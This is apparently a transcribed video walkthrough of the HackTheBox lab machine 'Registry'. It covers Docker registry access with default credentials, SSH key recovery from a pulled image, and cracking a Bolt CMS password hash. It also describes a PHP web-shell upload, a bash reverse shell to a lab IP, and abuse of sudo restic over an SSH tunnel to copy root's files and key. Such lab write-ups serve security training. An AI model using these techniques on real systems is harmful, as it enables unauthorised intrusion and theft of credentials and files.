What's going on YouTube? This is IPsec. I'm doing Registry from HackTheBox, and I bet a lot of people were like me and thought this was going to be a Windows box because of the name Registry, but no, this is a Linux box dealing with the Docker Registry, which is just a repository for containers. So once you figure that out and how to access the registry, you can pull down a container, do some forensics on it, find an SSH key that allows you access into the actual box itself. And then when you look around the web server on that box, you notice the user www-data can sudo to run a backup command. So you have to do some light exploitation on the box to get a shell as that user. And then when you back up the root directory, you get not only root.txt, but an SSH key to access the box as root. So with all that being said, let's just jump in and do the box. As always, we're going to start off with an nmap, so -sc for default scripts, sv enumerate versions, oa output all formats, put in the nmap directory and call it registry, and then the IP address, which is 10.10.10.159. Can take some time to run, so I've already ran it. Looking at the ports, we have just 3 open. We have SSH on port 22, and its banner tells us it's an Ubuntu server. We also have HTTP on port 80. It's running Nginx, and these scripts don't really tell us all that much. We also have HTTPS on 443 as Nginx as well, but because it's an SSL service, we get a bit more information, such as the certificate leaking the hostname, which is Docker.Registry.htb, and then we also see when the certificate was generated. And this can be kind of a hint at things to do, since we see it's relatively recent at May 6, 2019. It's probably a relatively up-to-date box. If I saw a certificate that was valid from like 2012 to 2022, I may try older vulnerabilities such as Heartbleed, Shellshock, etc., just because I know the box was around in a much earlier year. Doesn't mean the box wasn't generated before that, because this is just when the certificate was generated, but again, most people probably wouldn't register a certificate unless it's about to expire. And of course, things like Let's Encrypt that do super short time spans, that can get thrown out the window because you always have an up-to-date cert. But for now, let's just move on and create this Docker.Registry.htb in a host file. So we can do 10.10.10.159, put Docker.Registry.htb, and I'm also just going to put the parent Registry.htb just in case that matters. Save that, and we're going to go to 10.10.10.159. Look at this page. It's just the welcome to Nginx. And then I'm also going to do Docker.Registry.htb. We get just a blank page, and I'll do it as SSL as well. So HTTPS. I copy the HTTP. Do this, and we can poke around at the certificate just in case there's something that nmap missed, such as like an email that may have a username or something. Always good just to look at the SSL certificate. So going through Docker.Registry, and we don't see any other information. So let's just accept this, and we're also just going to a blank page. So Docker.Registry.htb goes here, and just 10.10.10.159 goes to the welcome to Nginx page, and we can try Registry.htb as well, and that also goes to the welcome to Nginx page. So 2 different sites on this box. Going back over to the nmap scan, we see Nginx 1.14.0. I'm just going to manually do a curl against this, so -vvv because I want super verbose, HTTP 10.10.10.159. Then we're going to split the pane. Actually, I want to do the other split. Curl -k HTTPS 10.10.10.159, and we'll throw a few V's in there as well. I know there's a flag in curl to only display the header, but I don't know off the top of my head, so that's why I'm doing it this way. So I'm just going to go up, and I'm looking at both of the headers of the web server just because I'm curious if there's anything that is different between the two. So let's get here. So Nginx is at the same spot. So what, up to? 1, 2. So Nginx is the same, HTTP is the same, the dates, both in the same time zone and around the same time. So looking at this, it's probably the same exact Nginx server so far because we see no differences. Every now and then you'll see different like versions. So maybe like Nginx version 1.12 instead of 1.14. which can be a big hint there's some type of VM or something on the box. So nothing there. Let us just go and start a GoBuster before we manually poke at the box. So we'll do GoBuster -u http registry.htb-w user share word list dirbuster directory list 23 medium -o. We'll do GoBuster-registry.out. And for this one, let's copy it. And we're going to do something very similar. I'm going to hit up now. Let's copy this. I also have to put it in dir mode. I always forget that one flag. I guess because I used GoBuster for so long. Let's do Docker.Registry.htb. And we'll do GoBuster-Docker.out. Before I do this, I'm going to try /index.php just to see if that exists. And if I saw that, then I'd probably do the extension -x.php. So let's just run both of these GoBusters and begin looking at these servers. So let's try robots.txt. Don't see anything. We can try robots.txt here. Don't see anything. We could see if we can enumerate usernames. So like squiggly root, see if that goes to a home directory. Sometimes that is a quick win. Don't see anything there. Going back to GoBuster, we do have /install. So let's go take a look there. I guess my clipboard copied everything. Let's just do /install. And we get a bunch of gibberish. So let's make a new pane. We'll make dir http. And this will be things we just download. So I can do wget to download this file. And we can do file against index.html. And see it is a gzip file. So I'm going to move index.html to install.gz. And we'll do gzip-d on this. And we get unexpected end of file. Let's just try zcat on the file. And it looks like we can see the contents. So we see ca.cert and then begin certificate. So I'm going to put this to just install. And we do file against this. It's a tar archive now. So we can do tar-xvf install. And then it extracted ca.cert in readme. So this is the file name. This is some magical tar things and like permissions. And then you got the actual file contents. And then you got the file name readme.md, which is the other file in the tar archive, some magical tar stuff, and then the actual file. So that's how that works. I'm not sure why the gzip command failed. I just didn't have the like magical bytes at the end of the file to tell it that the decompression was done, but obviously we could see it. So looking at ca.cert, not exactly sure what this will be, so I'm just going to rename the HTTP directory to install because that is what the name of the archive was. And we can go back to GoBusters to see if we have anything else. We have /v2 on the Docker.Registry.htb. So let's go take a look at what that is. It was on the Docker page, so go to Docker.Registry.htb/v2, and we get, it is requesting a username and password. Let's just try like admin. It's always my go-to first attempt. And we get logged in, and it's just displaying a JSON thing. So this is some type of JSON API, and knowing a little bit about Docker, registry is a repository for Docker. So how you have apt in Ubuntu or Debian, think of that for Docker. So a registry contains a bunch of Docker images that you can download and run. So I'm going to Google Docker Registry API, and we're going to take a look at it to see exactly how to use it. It's saying it accepts JSON data is probably a hint that it's an API. If you did a curl against this, or we can just look at it in Burp Suite, you'll see that it responds with, it accepts JavaScript. Is my Burp Suite intercept off, refresh, send it to repeater, click send, and we can see where it is accept. Content type application/JSON. So that's why Firefox is displaying this page. It's not actually returning any contents. It just knows that it's a JSON thing, so it goes and displays that. A little bit weird, but that's how it works. So looking at this, probably should read the API, but here we go, over to v2 names. So for example, an API endpoint that will work with library Ubuntu would be this. So we could try this at first. So let's try v2 library Ubuntu. We get 404 not found. Let's see, if we keep going through this, we could probably find a way to list things. So listing repositories is _catalog. So if we do v2/_catalog, we get the repository of Bolt-image. So if you read this more, you'd be able to understand everything to do, but we can just go to like /Bolt-image tags list, I think. And we have the tag is latest. So if it had multiple things, this would be like multiple versions. So we can probably just say, instead of tags latest, manifest latest. And then if we download this file, let's go move it. That's not manifest. What did it download? Is it a capital M? Okay, I don't know what you just downloaded. Some file save. Oh, it's latest. Okay. So if we do file against this, it is just JSON data. So we can cat it, or we can do cat pipe it to JQ, get some highlighting, and see what this is. You get a bunch of blobs, and there's a way to download each of these blobs. Let's see. Let's just try latest, maybe FS layers, and then the blob. So let's try latest. Let's see. Bolt image, FS layers. Let's try if this works. Layers, like this, not found. Is it SHA-256? Not found. If we search this for blob, let's see. Where is the download? Pulling a layer. Name, blobs, digest. So if we do bolt image, then blobs, v2 name blobs digest. v2 name blobs. There's the digest here. History v1. I don't think you include this. Because that doesn't look like oh, you do. Okay. I was going to say, it's weird seeing the colon in it, but if we download this file and we can move it here and do a file against it, we can see it's gzip data, so we can do gzip-d against this. We got to move it so it has a gz extension. And then file against it. It is a tar archive, so we're going to make dir. I'm just going to call this temp, because this isn't how we're actually going to do it. This is just one way you could do it. I don't like this way. tar-x cvf. We got to move this to be .tar tar-x for extract vf. I don't know why I had the C. C is create. And we get etc profile.d 01 SSH. So we could less this. And we see a password. We can look at what this .wh file is. And it's nothing, but I won't even take note of the password. It is important, but I really don't like doing it this way. Just because it's kind of wonky, and I guess it is acceptable. In hacking, there's no non-acceptable things, just things that are slightly better, I guess. I'm going to install Docker on my system, and we're going to point our Docker at this, and then download the image and get an actual shell and play with it. So let's do that. So if I don't run the command Docker, it's not found. So I'm going to do apt search Docker, and we're going to find where Docker is. What is the package name? There's so many. Docker.Registry if we want to set up our own Docker registry, but Docker.io is what we actually want. So I'm going to do apt install Docker.io, and we're going to now be able to run Docker. So, well, once it unpacks. So now we have Docker installed. If we do which Docker, it's there. So let us log into the repository with Docker. So running Docker login, Docker.Registry.htb. Username was admin, password was admin, and we get this 509 certificate signed by an unknown authority. There's a way to probably ignore certificates. So that's just like if we try to curl HTTPS docker.registry.htb and it doesn't go to the page unless we type -k to ignore it. Instead of trying to ignore it, because that's something you should never really do, especially with Docker, let's just add the CA certificate, because there was that install directory that gave us ca.cert. So Docker looks for certificates and etc docker certs.d, and then the host name, so docker.registry.htb. I'm going to do a -p so it creates the parent directories, because for some reason certs.d is not created. So make dir -p, and we can copy ca.cert to that directory. And now when we run this docker login command, logging in with admin, we screwed something up. So cd etc docker certs.d docker.registry.hb. So let's do docker.registry.htb. And now when we log in, we get our password was stored unencrypted in root docker config.json. So we can look at that and just see it's there. It's in base64, I believe. Not that this matters, just something you should be aware of. So maybe if you pop on a box that you think people have used Docker with, maybe there's a file you want to look at because they may have plain text creds there. So since we knew the password, that's not important. But now we can run docker run and then docker registry.htb/bolt image, which is the name of the image we want. And I'm going to say run sh, which is a shell. So it's downloading it from the Docker registry, and then once it finishes downloading, we can execute it. And each of these are the blobs. So we see 1, 2, 3, 4, 5, 6, 7, 8, 9 blobs. If we go back here, where is it? That's catalog, tags list. What did we do to see blobs? Manifest. I think it was manifest. Oh, it's a file. ls latest. So grep sum on latest. And then we can pipe that to wc-l nc10. So that is that. Now we have a shell on this, so let's go take a look. Now we have that Docker container up and running. So this shell is actually on our local system because our system is running this Docker image. So we can just take a look at it, and it's the same thing as if we had pulled each blob and manually examined it, but having a shell and navigating through it is just sexier than going through a bunch of, well, I guess, file systems or whatever it is. So let's go to /root, and then we can do find .-type f to display all the files in root, and we see a SSH key. So let's take a look at .sh/id_RSA, and we see begin encrypted private key, or begin RSA private key, but it is encrypted. So I'm going to type bash to see if it's here. Now I have a better shell. So I'm going to copy this key over to my box, and I'm going to save some time and not crack it. If you want to, well, not send it to John to be cracked, because if you remember, we got that password from the very first blob, coincidentally. That's a password to this key, but I'm going to show how I went about and found the password, because this is the way I did the box. So let's make dir SSH, and we can put ID RSA, and I copied it via tmux, so paste it with that clipboard. If we go .sh, we can cat ID RSA.pub, and we see its username is Bolt at Registry.htb, so presumably this key is for the Bolt user. So I'm going to rename ID RSA to Bolt, just so I remember. So we have a shell to this box. We can also go to like /home to see if there's any users. There isn't. We could check la var www html, and we see sync.sh. So let's cat what that file is to see what it is. And it's just syncing registry var www html bolt. So it's going into the Bolt directory on the registry box using that SSH thing. If we go back in, SSH is there .config. There is. So because there is a SSH config file, the host registry, so whenever this container SSHs to the box registry, it's going to use the user Bolt and the hostname registry.htb. So that's kind of what I do with the Kraken. Whenever you see me type SSH Kraken, I believe I have that as a host file, or a config file in SSH. And I'm really hoping I don't have anything else in this SSH config that's sensitive. No, not really. Just other boxes that have retired. So you can see host Kraken, it's using the user root, the host name as this IP, because Kraken isn't a DNS name on my local subnet. I just have it hard-coded to that IP, and then using this SSH key. So that's how that is configured. Let's take a look at root. There is no root.txt here. And since there was nothing in home, there's no user.txt. But May 25th seems to be an interesting date, because that's when IDRSA was, and that's where everything else is. Remember, the certificate was also generated on May 6, 2019, from the very beginning of this video. So the period between May 6 and May 26, probably interesting. And you should always incorporate some type of instant response whenever you do anything, because it is just super handy. So here I'm going to search for all files modified between 2019 0506. We'll do 0505 actually, because that is a day before the SSL certificate was generated. And then newer MT 2019 0526, a day after the SSH key. We can do dev null, and I always like doing -ls to see permissions. I think I started talking after I typed newer and forgot to type MT for modified time. Let's see, find / type F. There we go. So I'm not really that interested right away in stuff in var, just because maybe var temp and var log have interesting things, but let's just get rid of that. So I'm just going to do grep-v on, we'll do, whoops, space / var to exclude that stuff. So let's see, we got /run nginx.pid on May 25th, libcurl, we have viminfo, which could be interesting because it's non-0 bytes, so there's information in this file. Going through, you do have this 01 SSH, so, and look at this, and I also notice we never looked at shadow, so if we less etc shadow, there's no passwords in here. And look at passwd, no passwords there. So we can't really crack any of those stuff. But look at this profile.d01-sh.sh, and we see it is running expect SSH agent. It's spawning the command SSH add, adding the key to the agent, and then it's expecting to get a password. And then it's sending the password and saying, hey, the identity has been added. So if we try to SSH, actually before I SSH, let's chmod 600 because all SSH keys should be 600. SSH bolt at Registry.htb. And we have to specify -i bolt. Yes. And put the password, and we get in. Before I move on, let's just go and do some things. So if you didn't understand the SSH host file, let's go and show you. So .sh config, and I'm going to copy the 4 lines. Whoops. I keep hitting 2 keys at once. We're going to do host totally does not exist. And its host name is going to be 10.10.10.159. The user is going to be Bolt, and the identity file is going to be root HTB boxes registry SSH bolt. So if I do SSH to totally does not exist, it's going to ask for the passphrase, and we log in. So again, this host thing is just what you type when you try to SSH. It will actually use the value of host name to actually get to the box. So that's that piece. And then also, I want to emphasize doing like IR forensics in your thing, because I mentioned let's just run this find command again. I mentioned viminfo was not 0. So we take a look at this, and we can see vim was used to edit these files, sync.sh and the profile thing. And this is just a file vim uses to keep like a history contents of what it does. So if we edit this file, let's do lsla root.viminfo, so you can see last edit was May 25th. Vim on this file. Let's go down to this E line and then exit Vim. Do it again. We're still on E. And it remembers that based upon that Vim info. So now it was modified April 2nd. So always handy to have. You can poke around those files to see what programs were being used for. So definitely handy. And also, if I saw Vim info, I tried to search for like the Vim backup file, which I think is like, we can just check etc profile.d. Actually, let's do it on here. So SSH, do lsla, nothing is here. If we do vi bolt, lsla, Vim created a swap file.bolt.swap. So if I knew the administrator of the box loved to use Vim, I'd also hunt for these .swp files to see if I can recover older versions of things. So some extra bits of information. So let's cat that file, get the password, and actually SSH to the box. Enough detours. So we can do SSH to Registry.htb -i bolt paste. Whoops, we forgot to specify the username. And now we are in this box. So first thing I'm going to do is run iptaddr to see if we're on the host or another Docker container. And based upon seeing eth0 and that being the IP address of registry, I'm pretty confident we're in the host operating system. Here is the Docker IP. So I may try to do things to look at the various Docker containers. So we can see 172.18.02, and I don't see that here. So I'm guessing this may be the registry. Try like 8,000. Don't know what port that is. Do we have nmap? Oh my god, we have nmap on this box. Port 5000. So if we curl on port 5000 /v2, so 172.18.02 is going to be the Docker container of this guy. So if I had cracked like Etsy Shadow or had any password in this, I tried going into this container live to see if it's the same exact thing as the web server, but I have no idea what the credentials are, and running nmap showed only a web server was exposed, not even SSH. So from the Bolt user, I don't know how to get into that Docker container. So I'm not even going to worry about it. And running groups, I'm not a member of the Docker group. So what can we do on this box? Well, lsla, and we see user.txt was created on September 26. There is a .sh directory, so I'm going to take a look at it. Authorize keys. And that's just going to be the key we already have the private key to. So nothing interesting there. It was doing something in var.www.html. So let's take a look at that. There is backup.php. And backup.php is doing a sudo restic backup-r. And then backing up the Bolt directory to this box, I believe. Doing sudo-l, put our password, assuming we have the password. I guess it's not my clipboard anymore. Copy, test the paste, sudo-l. That is not the password for this guy. So we either have to find the password for Bolt or try to escalate to the www data user. And we also see git with .bash history. It is 0. So maybe we want to look at something owned by the user git. So we can try find /-user git to dev null. Does that find it? It does. So right now we're just searching for anything with git and nothing is there. But there is Bolt and var.www.html. So let's go take a look at what /bolt is. So going to registry.htb /bolt. And it is just a website, it looks like. So I'm going to see if I can escalate to the www-data user, because I see this backup.php, and generally when things get executed on the web server, they're being executed as that user, and that user probably has privilege to run sudo, since we see sudo restic. So what I'm going to do is find .-writable to see if I can write anywhere, and I can't. So I have to figure out a vulnerability within Bolt. So we do a ls here, and I see various web directories. So we get index.php, src, test, license.md. I'm just going to try to go to bolt license.md. It does pull the file. We can try this file. I'm just seeing if, like, how this web server is configured. So it looks like we can access anything here. What is in the app directory? Theme, nut. How about index.php? So let's see. If we're running PHP's web built-in server, get app web.php, less web.php. It's running something. But if you dig through this a lot, or go back to GoBuster, if you do bolt, it brings you to a login. And Bolt is just a, what is Bolt? That's probably not going to be what I think it is. If you do a lot of research around this, dig through it, eventually it makes sense. But we get a potential login. I guess if we do searchploit on Bolt, whoops, let's do searchploit Bolt CMS. So that's what you'd be researching if you don't know exactly what this is. So it's a PHP CMS, which is a content management system. So doing a lot of research into that, you get to the sign-in page, looking into potential exploits. Let's see. Cross-site scripting, remote code execution, right here. I hate it says like cross-site request forgery. But I wish like RCE, that sticks out a lot more. And version 366. Is this saying what version it is? No, probably like the license file may have. Less license, 3.6. You get the copyright, so you know it's from 2019 probably. Changelog.md. So if you looked at the changelog.md, let's just save the file. Less downloads, changelog. We can see it's probably running version 364. So that would be how you know you have to go to that remote code execution. Bolt. Let's do -m to mirror. Go here. Less 466. And I don't know why some exploits do this. So this is showing a proof of concept like cross-site request forgery by tricking an admin into clicking a link. And then the link does a bunch of like cross-site scripting things. We can see the xhr.setRequest, XML HTTP request. If you want to see us create something like this, I just did a video on it. I bet if I search that, you can look at bank robber to understand what this whole thing is doing. We're just going to ignore it. And know once we log in, we can probably upload a file and then get code execution, because that is what this is doing. Form data, Bolt admin URL /upload. So it's uploading a file, editing a config, things like that. So if you read that whole thing and kind of understood what it did, then you know that. So we have to figure out how to log in to Bolt. And luckily, we have a shell on the web server. So I'm going to find .grep-i database. And we see app database bolt.db. So cd app database. Oh, cd app database. Don't want a beginning slash. We have bolt.db. So I can copy bolt.db to dev shm, and then we can just host this file. We could also do scp to copy it, but because my SSH key requires a password and I don't remember the password, it's just easier to host a web server. So python-m simple HTTP server. And then I'm going to go back to my box. And we'll just do wget-r for recursive, registry.htb :8000. And it's going to download everything in dev shm, which should probably just be the Bolt database. So registry.htb. And we can do file against data bolt.db, SQLite. So SQLite 3, bolt.db, .dump to dump everything, and we can look around. So right now we're looking at Bolt auth token, and we see 3.1 null, and then let's see, ID, username, token, salt. So I don't know what this is, but we see, oh, that's my IP. So I don't care about this one. Let's see. It's been a while since I've done SQLite. Can I do select stir from this? Yeah. .tables. Sweet. So what I was trying to do here to see maybe we could do some type of session hijack. If we just grabbed whatever the session was for a currently logged in user, we could go back to our Firefox and then edit our cookie to be that session of a logged in user and potentially get access to it. But that doesn't work. Blocks, crons, entry. This isn't too interesting, but Bolt users. So select stir from Bolt users, and we get a password, 2y10 whatever. So this is some type of bcrypt probably. And we see files/nc.php and shell.php. So something weird there. But let's try seeing if we can crack this password. Let's just create a new tab or go back to an old tab we haven't used. SSH Kraken, which again, the machine I dedicate to cracking because you should never crack in a VM. And I don't want to crack on my host because, well, I'm recording here and don't want to drop frames. So let's do hashes/bolt. Paste that hash. /hashcat --example -hashes. I'm going to do less. I'm going to search for 2y. 2 capital Y? Let's see. Let's do /hashcat example hashes grep-i bolt. Let's see. 2y10. Hash format 2y10. PHP. Let's see, password hash. Maybe let's put 2y10 hashcat. Search for password cracking. Does this tell us what format it is? Iteration. I'm just going to search for bcrypt, I guess. grep-i bcrypt 2 $. So this is probably it. So less bcrypt 3200. Let's just try that. So /hashcat -m 3200 hashes/bolt, And then we'll do opt word list rocku. And let this go. And see if it cracks. And for those that are wondering, I've done this box before, but I just had notes from when I did it like 4 or 5 months ago. So some of this stuff I'm actually trying to figure out for, I guess, maybe the 2nd or 5th time because I don't always remember everything. But we get the password as strawberry. So let's go and what was that? Oh, we're doing Bolt. So sign in to Bolt with admin and strawberry. And we get here. So that cross-site request forgery had us going to edit the config and then upload a file. So if we do file management, let's just try upload file. We can close out of these unused tabs. If we try to select a file, they were doing shell.php, so root HTB boxes registry. Let's create the file shell.php, and we'll do php request please subscribe. And we want to put system around that, so we actually execute the command. Okay. So if we try to upload this file, let's do all files, shell.php, upload. Could not be uploaded, it needs these extension types. So what it was doing was going into the config and editing the extension types. So let's go scroll till we get to extension types. I think I just passed it right here. Put PHP here, save it, and then we can go back to upload a file. Select shell.php, upload, open link in new tab, and we said it will execute anything with the please subscribe variable. So please subscribe is equal to who am I, www data. If we do pwd, we get this. So we can try sudo -l. If we look at the source, www data may run the following commands on Bolt. So now we know we have a shell. So let's get a reverse shell. So we'll do bash-i dev tcp 10.10.14.2 0 and 1 nclvnp 9001. Don't get anything. Let's just try bash-c. Nothing. Let's send this actually to burp, put it in a post request, because maybe it's the format that's screwing it up. So let's change request method. Control Z. Who am I? Sent to repeater. Make sure this works. 404 not found. So there must be something hitting that backup.php, which is causing this to revert probably. So let's hit save. Make sure this saves. Upload the shell. And this is where the box gets relatively annoying. So now we got the shell back. Bash-c, bash-i, dev tcp 10.10.14.2, 9001. 0, 1 like that. And then URL encode it with Control U. And we don't get anything back. So let's try going back to burp. We can do curl 10.10.14.2 port 9001. And nothing hits us. So let's try pinging. TCP dump -i ton 0 ICMP. And I'm going to get the argument for ping wrong. I just know it. Ping. We'll do -c1 for count. 10.10.14.2. Oh, I got the argument right. I'm actually getting better. -N is Windows for number. But we can see we can ping. We just can't go out TCP. What I'm going to do is go back here because this is where I'm SSH'd on the box. And we're going to do cd etc find.grep ipta, looking for like iptable rules. There's an iptables.conf. And we can see what rules are here. So we want to look at output. So on output to the 10 network, TCP, flags, fin, sin, rest, ack, sin, drop. So what this is doing is, it's also preventing UDP. So it is preventing us from starting a three-way handshake outbound. So let's see. Do we have it on other interfaces? We could try localhost. So let's do nclvnp 9001. And try curl 127.0.0.1 9001 to see if we can hit ourselves locally. 404 not found. So let's save the file, upload the shell again, save the file, upload the shell again. So it's waiting, and we got a hit back. So we can do, I don't know what B is, but B apparently worked. I meant to do V, but we should be able to do a shell on localhost because the output table is only that way. And also you don't see anything on input. So if we upload a netcat to the box, we could probably do it that way as well, of just having netcat bind to a port and then we connect to that port. But let's try this. --c, --i, dev TCP 127.0.0.1, 9001, 0 and 1. Control U, send. Oh, that's gonna, I'm gonna get angry. It's probably one of the more annoying things to have to do every time you want to run a command. All files, upload. Run that. And we get a shell as www-data. Awesome. So if we do python-c import pty, pty.spawn bin bash stty raw minus echo, hit fg enter. So now we just have a better thing where we have tab autocomplete and all that stuff. So we are now www-data. So let's go back and look at that backup.php file. What is it? Export term is equal to xterm. And now I can clear the screen. So it's running sudo restic -h. Enter password. Oh, because sudo -l restic has, we have to type backup-r rest. So the first thing I'm going to do, Google GTFO bins and see if it knows anything about Restic. It does not. If you don't know what this is, you type the binary, you click things, and it tells you how you can potentially abuse those binaries on Linux. Super awesome. It's like lol bins, but for Linux. So don't really have anything there. If we did a lot of research into Restic, like what is Restic? It's a backup solution that does backups right. So if we set up a REST server, So instead of backing up to backup.registry.htb, we back up to our box, then we'd be able to back up files. So what this is doing is sending the file Bolt to this location or directory. I think -r is recursive. So the main issue we're going to have is we can't initiate a packet outbound. So if we tried to run this command and had our REST server here, then it wouldn't work still because we can't send packets outbound. So if we do nc lvnp, let's do 8000 sudo restic backup -r rest http 10.10.14.2 port 8000 bolt, try to run that command. It never hits us. Again, that's because of that iptables rule. So in order to get around that, what we can do, let's see, can we do this still? I'm going to hit so if this is your first command on a SSH window, it pops up a hidden menu thing like that. So I'm going to do -R 8000 127.0.0.1 8000. So now I forwarded port 8000 on this box, and anything that hits that is going to get forwarded to me. So I do netcat 127.0.0.1 8000 hello from Bolt, and we can see it goes through this tunnel. So now if I run this command again, the restic backup, if I was listening on 8000 and we change, oh god, what is it? STTY call? I think calls. Let's do STTY-A. Calls 146 rows 18. I think that said it, so now I can do this command. If you notice before, the columns were set to whatever number this is. So once I hit that, it would wrap it to the beginning. So I just expanded it to go down to this end. Just fixing my terminal up. So now we can do 127.0.0.1 on port 8000. And I'm listening on port 8000 on this box. It hits it. So now we have to set up a Restic server on Kali. So it actually understands that protocol. And it's written in Golang. But the easiest way to run it is through Docker. But before we install Restic, we have to install the Docker container. We have to set up the environment. So I'm installing Restic on my box. And what I'm going to do is create the file system in this folder and then share that file system to the Docker container, because Dockers aren't really supposed to be persistent. So this is probably a good way to do it, I guess. So I'm going to make the directory data, and we're going to go restic init-r data. Password for the repository, I'm just going to do password. Okay. And now it has created that repository. So if I do ls data, we have everything. But we have to set up the Restic server. So what I'm going to do is docker run. We're going to do port 8000, 8000. So that is mapping port 8000 on my local box to 8000 to the Docker container. And then -v for volume. Root HTB boxes registry, and we're going to do data, and I'm going to share that in /data, and then -it for image name, restic, rest server, and I'm going to do sh to execute. And this is just going to pull a Restic image from Docker Hub, I believe, or maybe pull it from registry, probably Docker Hub. I should have done like a TCP dump or something and looked at it. But anyways, we got a Restic server running on our box. So what we want to do is type rest server --path/data. And now it started the server on port 8000. And data, if we go to /data, that is just that volume mount thing we did. So run this. Now we run this backup command again. And oh, so this is going to be just /. And then we could leave it at Bolt and see what this does. The password was password. And now it's backing up. And it's backing up quite a bit. Did I just back up the whole box? Hopefully I didn't. 206 megs. That is big. Yeah. I'm just going to probably pause the video and let this finish. So now it has saved. So let's go and make the directory restore. And we can just do restic -r data. We're specifying where the Restic file system is. And that is in data. So restic -r data. Restore latest, and then the target is going to be restore. The password was password. And now it is copying all the files to restore. Go into Bolt, and that is the website. So the website is just pretty big, 256 megs. So let's do the same exact thing, except instead of Bolt, we'll do /root. I just typed the password, so I have to type it again. And now it is saving. So let's go over to this window. Restore. What? I must be in a different window. We'll do restic -r data latest target restore. Restic.r restore data. Password is password. Now we go into restore. We have the root directory, and we have root.text, which is 33 characters, so that's 32 in a line break. You have a cron that is restoring things. If you do lsla, you also copy the .ssh directory, and there is a IDRSA, which is SSH key, so chmod 600 on that key, SSH-I, and Registry.htb. And we are now root on this box. So hope you guys enjoyed it. Take care, and I will see you all next week.